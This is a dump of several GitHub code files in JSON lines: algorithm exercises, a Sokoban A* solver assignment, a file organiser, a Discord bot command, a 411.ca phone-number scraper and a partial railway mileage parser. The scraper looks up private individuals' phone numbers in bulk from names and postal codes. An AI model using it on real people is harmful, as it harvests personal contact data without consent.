return None\n        \n        sum_needed = S / 3\n        # walk the array, cutting a segment each time the running sum reaches S/3\n        temp_sum = 0\n        start_ind = 0\n        FOUND_ALL_SEGMENTS = False\n        ret_list = []\n        for i, val in enumerate(in_list):\n            temp_sum += val\n            # if we get sum needed, then we add to result, reset temp_sum, and advance start_ind\n            if temp_sum == sum_needed:\n                ret_list.append(in_list[start_ind:i+1])\n                temp_sum = 0\n                start_ind = i+1\n                \n                # Once we get the 2nd segment we are done: the remainder must hold the third\n                if FOUND_ALL_SEGMENTS:\n                    ret_list.append(in_list[start_ind:])\n                    return ret_list\n                else:\n                    FOUND_ALL_SEGMENTS = True\n        \n\nin_list = [3, 5, 8, 0, 8]\n\nprint(f\"Segments: {Solution().partition(in_list)}.\")\n\n    ","repo_name":"stingram/Simple-Problems","sub_path":"DailyCoding/399_partition_same_sum_3/python/partition_3.py","file_name":"partition_3.py","file_ext":"py","file_size_in_byte":1313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"20271336879","text":"\"\"\"\n\nGiven an integer array nums, find the contiguous subarray (containing at least one number) which has the largest sum and return its sum.\n\nExample:\n\nInput: [-2,1,-3,4,-1,2,1,-5,4],\nOutput: 6\nExplanation: [4,-1,2,1] has the largest sum = 6.\n\n\n\"\"\"\n\ndef max_sub_array(nums:list[int]):\n    largestSoFar = float('-inf')\n    currentSum = 0\n    for num in nums:\n        currentSum += num\n\n        if currentSum > largestSoFar:\n            largestSoFar = currentSum\n\n        if currentSum < 0:\n            currentSum = 0\n\n    return largestSoFar\n\n\nprint(max_sub_array([-2,1,-3,4,-1,2,1,-5,4]))","repo_name":"ChibuezeOnejeme/My_Python_Hackerank_Practice_and_Solutions","sub_path":"max_sub_array.py","file_name":"max_sub_array.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"37870527380","text":"\n'''\n\n    Sokoban assignment\n\n\nThe functions and classes defined in this module will be called by a marker script. \nYou should complete the functions and classes according to their specified interfaces.\n\nNo partial marks will be awarded for functions that do not meet the specifications\nof the interfaces.\n\nYou are NOT allowed to change the defined interfaces.\nIn other words, you must fully adhere to the specifications of the \nfunctions, their arguments and returned values.\nChanging the interface of a function will likely result in a fail \nfor the test of your code. This is not negotiable! \n\nYou have to make sure that your code works with the files provided \n(search.py and sokoban.py) as your code will be tested \nwith the original copies of these files. 
\n\nLast modified 2022-03-27 by f.maire@qut.edu.au\n- clarify some comments, rename some functions\n  (and hopefully didn't introduce any bug!)\n\n'''\n\n# You have to make sure that your code works with \n# the files provided (search.py and sokoban.py) as your code will be tested \n# with these files\nimport search \nimport sokoban\n\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n\ndef my_team():\n    '''\n    Return the list of the team members of this assignment submission as a list\n    of triplet of the form (student_number, first_name, last_name)\n    \n    '''\n    return [ (10891188, 'Asif Reza', 'Chowdhury') ]\n    # raise NotImplementedError()\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n# Variables\n\n# cell definitions\nmark = {\n    \"space\": \" \",\n    \"box\": \"$\",\n    \"target\":\".\",\n    \"wall\":\"#\",\n    \"worker\": \"@\",\n    \"worker_target\":\"!\",\n    \"box_target\":\"*\",\n    \"taboo\":\"X\",\n    \"removed\":['$','@'],\n    \"three_targets\":['.','*','!']\n}\n\n# directions defined as (dx, dy) deltas\ndirection= {\n    \"Up\": (0, -1),\n    \"Down\": (0, 1),\n    \"Left\": (-1, 0),\n    \"Right\": (1, 0)\n}\n\n# the final location in the 2D area after a move\ndef moveIn2D(loc,delta):\n    return (loc[0]+delta[0], loc[1] + delta[1])\n\n# check for a wall on any of the four sides\ndef checkWall (index, walls):\n    return moveIn2D(index, direction[\"Up\"]) in walls \\\n           or moveIn2D(index, direction[\"Down\"]) in walls \\\n           or moveIn2D(index, direction[\"Left\"]) in walls \\\n           or moveIn2D(index, direction[\"Right\"]) in walls\n\n# check corners\ndef checkCorner(index,walls):\n    # Checking top and left cells for wall marks\n    if moveIn2D(index, direction[\"Up\"]) in walls \\\n            and moveIn2D(index, direction[\"Left\"]) in walls:\n        return True\n\n    # Checking top and right cells for wall marks\n    if moveIn2D(index, direction[\"Up\"]) in walls \\\n            and moveIn2D(index, direction[\"Right\"]) in walls:\n        return True\n\n    # Checking bottom and left cells for wall marks\n    if moveIn2D(index, direction[\"Down\"]) in walls \\\n            and moveIn2D(index, direction[\"Left\"]) in walls:\n        return True\n\n    # Checking bottom and right cells for wall marks\n    if moveIn2D(index, direction[\"Down\"]) in walls \\\n            and moveIn2D(index, direction[\"Right\"]) in walls:\n        return True\n\n    # otherwise the cell is not a corner\n    return False\n\n# Manhattan distance between two points\ndef mhDistance(loc1, loc2):\n    return (abs(loc1[0] - loc2[0]) + abs(loc1[1] - loc2[1]))\n\n# cells that would make the puzzle unsolvable if a box were pushed onto them\ndef restrictedCells(warehouse):\n    def rule1st():\n        # looping the rows\n        for rowID in range(warehouse.nrows):\n            outWall = True\n            # looping the columns\n            for colID in range(warehouse.ncols):\n                matrixID = (colID, rowID)\n                square = warehouse2D[rowID][colID]\n                if outWall and square == mark[\"wall\"]:\n                    outWall = False\n\n                elif not outWall:\n                    if all([cell == mark[\"space\"] for cell in warehouse2D[rowID][colID:]]):\n                        break\n                    if square == mark[\"space\"] and checkCorner(matrixID, walls):\n                        warehouse2D[rowID][colID] = mark[\"taboo\"]\n    \n    def rule2nd():\n        # looping the rows\n        for rowID in range(warehouse.nrows):\n            # looping the columns\n            for colID in range(warehouse.ncols):\n                matrixID = (colID, rowID)\n                square = warehouse2D[rowID][colID]\n                if square == mark[\"taboo\"] and checkCorner(matrixID, walls):\n                    remainingRow = warehouse2D[rowID][colID+1:]\n                    remainingCol = [row[colID] for row in warehouse2D[rowID+1:]]\n\n                    for idx, val in enumerate(remainingCol):\n                        if val == mark[\"wall\"] or val 
in mark[\"three_targets\"]:\n break\n if val == mark[\"taboo\"] and checkCorner((colID, rowID+idx+1), walls):\n if all([checkWall((colID, loc), walls) for loc in range(rowID+1, rowID+idx+1)]):\n for loc in range(rowID+1, rowID+idx+1):\n warehouse2D[loc][colID] = mark[\"taboo\"]\n \n for idx, val in enumerate(remainingRow):\n if val == mark[\"wall\"] or val in mark[\"three_targets\"]:\n break\n if val == mark[\"taboo\"] and checkCorner((colID+idx+1, rowID), walls):\n if all([checkWall((loc, rowID), walls) for loc in range(colID+1, colID+idx+1)]):\n for loc in range(colID+1, colID+idx+1):\n warehouse2D[rowID][loc] = mark[\"taboo\"]\n\n\n # location of all walls\n walls = warehouse.walls\n\n # converting warehouse to string\n warehouseStr = str(warehouse)\n\n # replacing the cell marks for box and player with space,\n for cell in mark[\"removed\"]:\n warehouseStr = warehouseStr.replace(cell, \" \")\n\n # splitting warehouse string into 2D matrix\n warehouse2D = [list(line) for line in warehouseStr.splitlines()]\n\n # aapplying the rules\n rule1st()\n rule2nd()\n\n #joining sokoban string list to full string\n warehouseStr = '\\n'.join([\"\".join(row) for row in warehouse2D])\n\n # replacing the target marks\n for cell in mark[\"three_targets\"]:\n warehouseStr = warehouseStr.replace(cell, \" \")\n\n return warehouseStr\n\n# - - - - - - - - - - - - - - - - - - - - - - - -\nclass SokobanPuzzle(search.Problem):\n '''\n An instance of the class 'SokobanPuzzle' represents a Sokoban puzzle.\n An instance contains information about the walls, the targets, the boxes\n and the worker.\n\n Your implementation should be fully compatible with the search functions of \n the provided module 'search.py'. \n \n '''\n \n def __init__(self, warehouse):\n self.warehouse = warehouse\n self.cache = {}\n self.initial = warehouse.worker, tuple(warehouse.boxes)\n self.taboo = [sokoban.find_2D_iterator(\n restrictedCells(self.warehouse).splitlines(), mark[\"taboo\"])]\n self.weights = warehouse.weights\n self.boxes = warehouse.boxes\n self.walls = warehouse.walls\n self.goal = warehouse.targets\n\n def actions(self, state):\n \"\"\"\n Return the list of legal actions that can be executed in the given state.\n \n \"\"\"\n # state of worker and box\n workerState = state[0]\n boxState = list(state[1])\n # action list\n actions = []\n\n # looping for directions\n for key in direction.keys():\n nextWorkerState = moveIn2D(workerState, direction.get(key))\n if nextWorkerState in self.walls:\n continue\n # for pushing a box\n if nextWorkerState in boxState:\n nextBoxState = moveIn2D(nextWorkerState, direction.get(key))\n if nextBoxState not in self.walls and \\\n nextBoxState not in self.taboo and \\\n nextBoxState not in boxState:\n actions.append(key)\n else:\n actions.append(key)\n return actions\n\n def result(self, state, action):\n workerState = state[0]\n boxState = list(state[1])\n \n \n # assuming the next worker state\n nextWorkerState = moveIn2D(workerState, direction.get(action))\n\n\n # checking the next worker state for a box\n if nextWorkerState in boxState:\n nextBoxState = moveIn2D(nextWorkerState, direction.get(action))\n box_index = boxState.index(nextWorkerState)\n boxState[box_index] = nextBoxState\n\n\n return nextWorkerState, tuple(boxState)\n\n\n def pathCost(self, k, state1, action, state2):\n if state1[1] != state2[1]:\n box_index = state1[1].index(state2[0])\n box_cost = self.weights[box_index]\n return box_cost + k + 1\n else:\n return k + 1\n\n\n def goalTest(self, state):\n return set(self.goal) 
== set(state[1])\n\n\n    def h(self, n):\n        # heuristic: for each box, worker-to-box distance plus the weighted\n        # Manhattan distance from the box to its nearest target\n        boxes = list(n.state[1])\n        worker = n.state[0]\n        targets = self.goal\n        heuristic = 0\n        weights = self.weights\n        for idx, box in enumerate(boxes):\n            minDistance = float('inf')\n            workerDistance = mhDistance(box, worker)\n            for target in targets:\n                distance = mhDistance(box, target) * (weights[idx] + 1)\n                if minDistance > distance:\n                    minDistance = distance\n            heuristic += workerDistance\n            heuristic += minDistance\n        return heuristic\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\ndef check_elem_action_seq(warehouse, action_seq):\n    '''\n    \n    Determine if the sequence of actions listed in 'action_seq' is legal or not.\n    \n    Important notes:\n      - a legal sequence of actions does not necessarily solve the puzzle.\n      - an action is legal even if it pushes a box onto a taboo cell.\n        \n    @param warehouse: a valid Warehouse object\n\n    @param action_seq: a sequence of legal actions.\n           For example, ['Left', 'Down', 'Down', 'Right', 'Up', 'Down']\n    \n    @return\n        The string 'Impossible', if one of the actions was not valid.\n           For example, if the agent tries to push two boxes at the same time,\n                        or push a box into a wall.\n        Otherwise, if all actions were successful, return                 \n               A string representing the state of the puzzle after applying\n               the sequence of actions.  This must be the same string as the\n               string returned by the method  Warehouse.__str__()\n    '''\n    # loop over the actions\n    for action in action_seq:\n        currentLocation = warehouse.worker #worker location\n        if action in list(direction.keys()):\n            nextWorkerLocation = moveIn2D(currentLocation, direction.get(action)) #new location of worker\n            if nextWorkerLocation in warehouse.walls:\n                return \"Impossible\"\n            elif nextWorkerLocation in warehouse.boxes:\n                nextBoxLocation = moveIn2D(nextWorkerLocation, direction.get(action)) # box location after moving\n                if nextBoxLocation in warehouse.walls or nextBoxLocation in warehouse.boxes:\n                    return \"Impossible\"\n                else:\n                    boxIndex = warehouse.boxes.index(nextWorkerLocation)\n                    warehouse.boxes[boxIndex] = nextBoxLocation\n            else:\n                warehouse.worker = nextWorkerLocation\n    return warehouse.__str__()\n    \n\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\ndef solve_weighted_sokoban(warehouse):\n    '''\n    This function analyses the given warehouse.\n    It returns two items. The first item is an action sequence solution. 
\n    The second item is the total cost of this action sequence.\n    \n    @param \n     warehouse: a valid Warehouse object\n\n    @return\n    \n        If puzzle cannot be solved \n            return 'Impossible', None\n        \n        If a solution was found, \n            return S, C \n            where S is a list of actions that solves\n            the given puzzle coded with 'Left', 'Right', 'Up', 'Down'\n            For example, ['Left', 'Down', 'Down', 'Right', 'Up', 'Down']\n            If the puzzle is already in a goal state, simply return []\n            C is the total cost of the action sequence C\n\n    '''\n    finalSokoban = SokobanPuzzle(warehouse)\n\n    # apply A* graph search to find a solution\n    solution = search.astar_graph_search(finalSokoban)\n\n    if solution is None:\n        return 'Impossible', None\n    else:\n        # get one possible action sequence from class Node.solution()\n        S = solution.solution()\n        # get the total cost\n        C = solution.path_cost\n\n        return S, C\n\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n","repo_name":"asifrezac/socoban-puzzle-solver","sub_path":"mySokobanSolver.py","file_name":"mySokobanSolver.py","file_ext":"py","file_size_in_byte":13029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"34033072908","text":"class Solution:\n    def subarraySum(self, nums: List[int], k: int) -> int:\n        total = 0\n        pre = {0:1}\n        count = 0\n        for n in nums:\n            total += n\n            if total - k in pre:\n                count+=pre[total - k]\n            pre[total] = pre.get(total, 0) + 1\n        return count\n\n\n    \n\n\n    \n\n    ","repo_name":"SimonMekonnen/A2SV","sub_path":"0560-subarray-sum-equals-k/0560-subarray-sum-equals-k.py","file_name":"0560-subarray-sum-equals-k.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"43185789837","text":"import os\r\nimport sys\r\nimport hashlib\r\n\r\n\r\n# Creates folders for different file types\r\ndef makeFolders(downloadDirectory, fileFormats):\r\n    for fileFormat in fileFormats:\r\n        directory = os.path.join(downloadDirectory, fileFormat)\r\n\r\n        if not os.path.exists(directory):\r\n            os.makedirs(directory)\r\n\r\n\r\n# Moves a file to its proper folder and deletes any duplicates\r\ndef moveFile(moveFile, downloadDirectory, fileFormats):\r\n    # The file format is what is after the period in the file name\r\n    if \".\" in moveFile:\r\n        temp = moveFile.split(\".\")\r\n        fileFormat = temp[-1]\r\n    else:\r\n        return\r\n\r\n    if fileFormat in fileFormats:\r\n        srcPath = os.path.join(downloadDirectory, moveFile)\r\n        dstPath = os.path.join(downloadDirectory, fileFormat, moveFile)\r\n\r\n        # If the file doesn't have a duplicate in the new folder, move it\r\n        try:\r\n            with open(dstPath):\r\n                # If the file already exists with that name and has the same md5 sum\r\n                if checkSum(srcPath) == checkSum(dstPath):\r\n                    os.remove(srcPath)\r\n                    print(\"removed \" + srcPath)\r\n        except IOError:\r\n            os.rename(srcPath, dstPath)\r\n        return\r\n\r\n\r\n# Get md5 checksum of a file. 
Chunk size is how much of the file to read at a time.\r\ndef checkSum(fileDir, chunkSize=8192):\r\n    md5 = hashlib.md5()\r\n    with open(fileDir, 'rb') as f:\r\n        while True:\r\n            chunk = f.read(chunkSize)\r\n            # If the chunk is empty, reached end of file so stop\r\n            if not chunk:\r\n                break\r\n            md5.update(chunk)\r\n    return md5.hexdigest()\r\n\r\n\r\ndef main():\r\n    # Folder names for the different file types\r\n    fileFormats = [\"Images\", \"Audio\", \"Video\", \"Documents\", \"Installer\", \"Compressed\", \"Virtual Machines and ISO Images\", \"Log Files\", \"SVG\", \"JSON\", \"Outlook\"]\r\n\r\n    # The first command-line argument is the download directory\r\n    downloadDirectory = sys.argv[1]\r\n    downloadFiles = os.listdir(downloadDirectory)\r\n    makeFolders(downloadDirectory, fileFormats)\r\n\r\n    for filename in downloadFiles:\r\n        moveFile(filename, downloadDirectory, fileFormats)\r\n\r\n\r\nmain()\r\n","repo_name":"bboisclair/organize-me","sub_path":"organize.py","file_name":"organize.py","file_ext":"py","file_size_in_byte":2251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"20510222375","text":"from DiscoTemplateBot.base_command import Command\n\nclass EchoCommand(Command):\n\n    def __init__(self) -> None:\n        super().__init__()\n        self.name = \"echo\"\n        self.permissions = [\"user\", \"developer\"]\n        self.description = \"Confirm bot can respond to messages\"\n        self.aliases = [\"echo\"]\n        self.requires_input = True\n\n    async def execute(self, message, ctx):\n        await message.channel.send(ctx.primary)","repo_name":"nickheyer/DiscoTemplate","sub_path":"DiscoTemplateBot/commands/echo.py","file_name":"echo.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"71217818876","text":"''' get phone numbers from 411\ncut -d ';' -f 10,11,12,13,14,16,19,23 mtl_steph.csv | awk -F ';' '{print $2,$1\",\"$4\",\"$3\",\"$5\",\"$6\",\"$7\",\"$8}' |python get_phone.py\n\nhttps://maps.google.ca/maps?q=Berri+%2F+Ren%C3%A9-L%C3%A9vesque,+Montr%C3%A9al,+QC&hl=fr&ie=UTF8&sll=45.619561,-73.605652&sspn=0.204828,0.506058&oq=berri+rene&hnear=Berri+%2F+Ren%C3%A9-L%C3%A9vesque&t=m&z=17\nhttp://411.ca/search/?q=denis%20lacasse&st=person&point=45.5756,-73.730621&nearme=1&p=1\n'''\nimport re\nimport sys\nimport urllib.request, urllib.error, urllib.parse\nimport time\npoint = '&point=45.619561,-73.605652&nearme=1&p=1'\nurl_411=\"http://411.ca/search/?q={name}&st=person%s\" %point\npattern_href = re.compile('.*<a href=\"(.*)\">... more</a>.*')\npattern_phone = re.compile('.*

<span itemprop=\"telephone\">(.*)</span>

.*')\npattern_postal = re.compile('.*<span itemprop=\"postalCode\">(.*)</span>.*')\n\ndef get_phone_number(full_name, postal_code=None):\n    try:\n        url = url_411.format(name=full_name).replace(\" \",\"%20\")\n        #print url\n        response = urllib.request.urlopen(url)\n        content = response.read().decode('utf-8', 'ignore')  # decode the bytes so the str patterns can match\n        url = \"http://411.ca/%s\" %pattern_href.search(content).group(1)\n        response = urllib.request.urlopen(url)\n        content = response.read().decode('utf-8', 'ignore')\n        postal = pattern_postal.search(content).group(1).replace(' ','')\n        if not postal or (postal and postal == postal_code): \n            return pattern_phone.search(content).group(1)\n        else:\n            print(\"%s != %s\" %(postal, postal_code))\n            return \"bad\"\n    except Exception as ex:\n        print(ex)\n        return None\n    \nif __name__ == \"__main__\":\n    from optparse import OptionParser\n    op = OptionParser(__doc__)\n    op.add_option(\"-n\", default=None, dest=\"name\", \n                  help=\"full name to search\")\n    op.add_option(\"-p\", default=0, type=\"int\", dest=\"pos_name\", \n                  help=\"position of full name\")\n    op.add_option(\"-P\", default=6, type=\"int\", dest=\"pos_postal\", \n                  help=\"position of postal code\")\n    op.add_option(\"-o\", default=\"numbers.csv\", dest=\"output\", \n                  help=\"output fname\")    \n    op.add_option(\"-s\", default=0, dest=\"sleep\", type=int, \n                  help=\"seconds to sleep between queries\")\n    opts, args = op.parse_args(sys.argv)\n    \n    if opts.name:\n        print(\"%s\\t%s\" %(opts.name, get_phone_number(opts.name)))\n    else:\n        print(\"reading from stdin, saving -> %s\" %(opts.output))\n        out = open(opts.output, 'w')\n        for i, line in enumerate(sys.stdin):\n            print(i+1)\n            line = line.strip()\n            els = line.split(',')\n            name = els[opts.pos_name]\n            postal = els[opts.pos_postal] \n            number = get_phone_number(name, postal)\n            if opts.sleep>0:\n                time.sleep(opts.sleep)\n            out.write(\"%s,%s\\n\" %(line, number))\n        out.close()\n","repo_name":"fraka6/mlboost","sub_path":"mlboost/politics/get_phone.py","file_name":"get_phone.py","file_ext":"py","file_size_in_byte":2918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"42905682777","text":"\"\"\"Collect `Engineer's Line References (ELRs) <http://www.railwaycodes.org.uk/elrs/elr0.shtm>`_.\"\"\"\n\nimport copy\nimport functools\nimport itertools\nimport os\nimport re\nimport string\nimport urllib.parse\n\nimport bs4\nimport numpy as np\nimport pandas as pd\nimport requests\nfrom pyhelpers.dirs import cd\nfrom pyhelpers.ops import confirmed, fake_requests_headers, loop_in_pairs\nfrom pyhelpers.store import load_data, save_data\nfrom pyhelpers.text import remove_punctuation\n\nfrom ..converter import kilometer_to_yard, mile_chain_to_mileage, mileage_to_mile_chain, yard_to_mileage\nfrom ..parser import get_catalogue, get_last_updated_date, parse_table\nfrom ..utils import collect_in_fetch_verbose, format_err_msg, home_page_url, init_data_dir, \\\n    is_home_connectable, is_str_float, print_conn_err, print_inst_conn_err, print_void_msg, \\\n    save_data_to_file, validate_initial\n\n\nclass ELRMileages:\n    \"\"\"\n    A class for collecting data of `Engineer's Line References (ELRs)`_.\n\n    .. 
_`Engineer's Line References (ELRs)`: http://www.railwaycodes.org.uk/elrs/elr0.shtm\n \"\"\"\n\n #: str: Name of the data.\n NAME = \"Engineer's Line References (ELRs)\"\n #: str: Key of the `dict `_-type data.\n KEY = 'ELRs and mileages'\n #: str: URL of the main web page of the data.\n URL = urllib.parse.urljoin(home_page_url(), '/elrs/elr0.shtm')\n #: str: Key of the data of the last updated date.\n KEY_TO_LAST_UPDATED_DATE = 'Last updated date'\n\n def __init__(self, data_dir=None, update=False, verbose=True):\n \"\"\"\n :param data_dir: The name of a folder for the data directory, defaults to ``None``.\n :type data_dir: str or None\n :param update: Whether to do an update check (for the package data), defaults to ``False``.\n :type update: bool\n :param verbose: Whether to print relevant information in console, defaults to ``True``.\n :type verbose: bool or int\n\n :ivar dict catalogue: The catalogue of the data.\n :ivar str last_updated_date: The last updated date.\n :ivar str data_dir: An absolute path to the data directory.\n :ivar str current_data_dir: An absolute path to the current data directory.\n :ivar list measure_headers: A list of possible headers for different measures.\n\n **Examples**::\n\n >>> from pyrcs.line_data import ELRMileages # from pyrcs import ELRMileages\n\n >>> em = ELRMileages()\n\n >>> em.NAME\n \"Engineer's Line References (ELRs)\"\n\n >>> em.URL\n 'http://www.railwaycodes.org.uk/elrs/elr0.shtm'\n \"\"\"\n\n print_conn_err(verbose=verbose)\n\n self.catalogue = get_catalogue(url=self.URL, update=update, confirmation_required=False)\n\n self.last_updated_date = get_last_updated_date(url=self.URL, parsed=True, as_date_type=False)\n\n self.data_dir, self.current_data_dir = init_data_dir(\n self, data_dir=data_dir, category=\"line-data\")\n\n self.measure_headers = [' '.join(x) for x in itertools.product(\n *(('Current', 'Later', 'Earlier', 'One', 'Original', 'Former', 'Alternative', 'Usual',\n 'New', 'Old'),\n ('measure', 'route')))]\n\n def _cdd(self, *sub_dir, mkdir=True, **kwargs):\n \"\"\"\n Change directory to package data directory and subdirectories (and/or a file).\n\n The directory for this module: ``\"data\\\\line-data\\\\elrs-and-mileages\"``.\n\n :param sub_dir: subdirectory or subdirectories (and/or a file)\n :type sub_dir: str\n :param mkdir: whether to create the specified directory, defaults to ``True``\n :type mkdir: bool\n :param kwargs: [optional] parameters of the function `pyhelpers.dir.cd`_\n :return: path to the backup data directory for the class\n :py:class:`~pyrcs.line_data.elr_mileage.ELRMileages`\n :rtype: str\n\n .. 
_`pyhelpers.dir.cd`:\n https://pyhelpers.readthedocs.io/en/latest/_generated/pyhelpers.dir.cd.html\n \"\"\"\n\n kwargs.update({'mkdir': mkdir})\n path = cd(self.data_dir, *sub_dir, **kwargs)\n\n return path\n\n def _split_measures(self, mileage_data, measure_headers_indices):\n \"\"\"\n Process data of mileage file with multiple measures.\n\n :param mileage_data: scraped raw mileage file from source web page\n :type: pandas.DataFrame\n \"\"\"\n\n dat = mileage_data.copy()\n\n if len(measure_headers_indices) >= 1:\n\n if len(measure_headers_indices) == 1 and measure_headers_indices[0] != 0:\n j = measure_headers_indices[0]\n m_key, m_val = dat.loc[j, 'Node'].split()\n d = {\n 'Earlier': 'Later',\n 'Later': 'Earlier',\n 'Alternative': 'One',\n 'One': 'Alternative',\n 'Original': 'Current',\n 'Current': 'Original',\n 'Former': 'Current',\n 'Old': 'Current',\n 'New': 'Old',\n }\n if m_key in d.keys():\n measure_headers_indices = [0] + [j + 1]\n new_m_key = d[m_key] + ' ' + m_val\n dat.loc[-1] = ['', new_m_key] # adding a row\n dat.index = dat.index + 1\n dat.sort_index(inplace=True)\n\n # if measure_headers_indices[-1] != dat.index[-1] - 1:\n # sep_rows_idx = loop_in_pairs(measure_headers_indices + [dat.index[-1]])\n # else:\n sep_rows_idx = loop_in_pairs(measure_headers_indices + [dat.index[-1] + 1])\n dat_ = {dat.loc[i, 'Node']: dat.loc[i + 1:j - 1] for i, j in sep_rows_idx}\n\n else:\n test_temp = dat[~dat['Mileage'].astype(bool)]\n if not test_temp.empty:\n test_temp_node, sep_rows_idx = test_temp['Node'].tolist(), test_temp.index[-1]\n\n if '1949 measure' in test_temp_node:\n dat['Node'] = dat['Node'].str.replace('1949 measure', 'Current measure')\n test_temp_node = [re.sub(r'1949 ', 'Current ', x) for x in test_temp_node]\n\n # if 'Distances in km' in test_temp_node:\n # dat_ = dat[~dat['Node'].str.contains('Distances in km')]\n # temp_mileages = dat_['Mileage'].map(\n # lambda x: mileage_to_mile_chain(yard_to_mileage(kilometer_to_yard(km=x))))\n # dat_['Mileage'] = temp_mileages.tolist()\n\n if 'One measure' in test_temp_node:\n sep_rows_idx = dat[dat['Node'].str.contains('Alternative measure')].index[0]\n m_dat_1, m_dat_2 = np.split(dat, [sep_rows_idx], axis=0)\n dat_ = {\n 'One measure':\n m_dat_1[~m_dat_1['Node'].str.contains('One measure')],\n 'Alternative measure':\n m_dat_2[~m_dat_2['Node'].str.contains('Alternative measure')],\n }\n\n elif 'Later measure' in test_temp_node:\n sep_rows_idx = dat[dat['Node'].str.contains('Later measure')].index[0]\n m_dat_1, m_dat_2 = np.split(dat, [sep_rows_idx], axis=0)\n dat_ = {\n 'Original measure': m_dat_1[~m_dat_1['Node'].str.contains('Original measure')],\n 'Later measure': m_dat_2[~m_dat_2['Node'].str.contains('Later measure')],\n }\n\n elif \"This line has two 'legs':\" in test_temp_node:\n dat_ = dat.iloc[1:].drop_duplicates(ignore_index=True)\n\n elif 'Measure sometimes used' in test_temp_node:\n sep_rows_idx = test_temp.index.tolist() + [dat.index[-1]]\n dat_ = {dat.loc[j, 'Node']: dat.loc[j + 1:k] for j, k in loop_in_pairs(sep_rows_idx)}\n\n else:\n alt_sep_rows_idx = [x in test_temp_node for x in self.measure_headers]\n num_of_measures = sum(alt_sep_rows_idx)\n\n if num_of_measures == 1: #\n m_name = self.measure_headers[alt_sep_rows_idx.index(True)] # measure name\n sep_rows_idx = dat[dat['Node'].str.contains(m_name)].index[0]\n m_dat_1, m_dat_2 = np.split(dat, [sep_rows_idx], axis=0)\n\n x = [x_ for x_ in test_temp_node if 'measure' in x_ or 'route' in x_][0]\n if re.match(r'(Original)|(Former)|(Alternative)|(Usual)', x):\n 
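# e.g. an 'Original measure' or 'Former route' heading becomes the corresponding 'Current ...' key for the first block\n                            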
measure_ = re.sub(r'(Original)|(Former)|(Alternative)|(Usual)', 'Current', x)\n else:\n measure_ = re.sub(r'(Current)|(Later)|(One)', 'Previous', x)\n\n dat_ = {\n measure_: m_dat_1.loc[0:sep_rows_idx, :],\n test_temp_node[0]: m_dat_2.loc[sep_rows_idx + 1:, :],\n }\n\n elif num_of_measures == 2: # e.g. elr='BTJ'\n sep_rows_idx_items = [\n self.measure_headers[x] for x in np.where(alt_sep_rows_idx)[0]]\n sep_rows_idx = dat[dat['Node'].isin(sep_rows_idx_items)].index[-1]\n\n m_dat_list = np.split(dat, [sep_rows_idx], axis=0) # m_dat_1, m_dat_2\n sep_rows_idx_items_checked = map(\n lambda x: x[x['Node'].isin(sep_rows_idx_items)]['Node'].iloc[0], m_dat_list)\n m_dat_list_ = map(lambda x: x[~x['Node'].isin(sep_rows_idx_items)], m_dat_list)\n\n dat_ = dict(zip(sep_rows_idx_items_checked, m_dat_list_))\n\n else:\n if dat.loc[sep_rows_idx, 'Mileage'] == '':\n dat.loc[sep_rows_idx, 'Mileage'] = dat.loc[sep_rows_idx - 1, 'Mileage']\n dat_ = dat\n\n else:\n dat_ = dat\n\n return dat_\n\n @staticmethod\n def _parse_mileage(mileage):\n \"\"\"\n Parse column of mileage data.\n\n :param mileage: column of mileage data\n :type mileage: pandas.Series\n :return: parsed mileages\n :rtype: pandas.DataFrame\n \"\"\"\n\n mileage.index = range(len(mileage))\n\n if any(mileage.str.match('.*km')):\n if all(mileage.str.match('.*km')):\n mileage_ = mileage.str.replace(r'km|\\(|\\)', '', regex=True).map(\n lambda x: yard_to_mileage(kilometer_to_yard(km=x.replace('≈', ''))))\n\n # Warning: This might not be correct!\n miles_chains = mileage_.map(mileage_to_mile_chain)\n\n else:\n miles_chains = mileage.map(lambda x: re.sub(r'/?\\d+\\.\\d+km/?', '', x))\n mileage_ = miles_chains.map(mile_chain_to_mileage)\n mileage_note = [x + ' (Approximate)' if x.startswith('≈') else x for x in list(mileage)]\n\n else:\n if all(mileage.map(is_str_float)):\n miles_chains = mileage\n mileage_note = [''] * len(miles_chains)\n\n else:\n miles_chains, mileage_note = [], []\n for m in mileage:\n if m == '':\n miles_chains.append(m)\n mileage_note.append('')\n elif m.startswith('(') and m.endswith(')'):\n miles_chains.append(re.search(r'\\d+\\.\\d+', m).group(0))\n mileage_note.append('Not on this route but given for reference')\n elif m.startswith('≈') or m.endswith('?'):\n miles_chains.append(m.strip('≈').strip('?'))\n mileage_note.append('Approximate')\n elif re.match(r'\\d+\\.\\d+/\\s?\\d+\\.\\d+', m):\n m1, m2 = m.split('/')\n miles_chains.append(m1)\n mileage_note.append(m2.strip() + ' (Alternative)')\n elif ' + ' in m or 'private portion' in m:\n m1 = re.search(r'\\d+\\.\\d+', m).group(0)\n miles_chains.append(m1)\n mileage_note.append(m.replace(m1, '').strip())\n elif '†' in m:\n miles_chains.append(m.replace('†', '').strip())\n mileage_note.append(\"(See 'Notes')\")\n else:\n if re.match(r'\\d+,\\d+', m):\n miles_chains.append(m.strip(' ').replace(',', '.'))\n else:\n miles_chains.append(m.strip(' ').replace(' ', '.'))\n mileage_note.append('')\n\n mileage_ = [mile_chain_to_mileage(m) for m in miles_chains]\n\n parsed_mileage_ = {\n 'Mileage': mileage_,\n 'Mileage_Note': mileage_note,\n 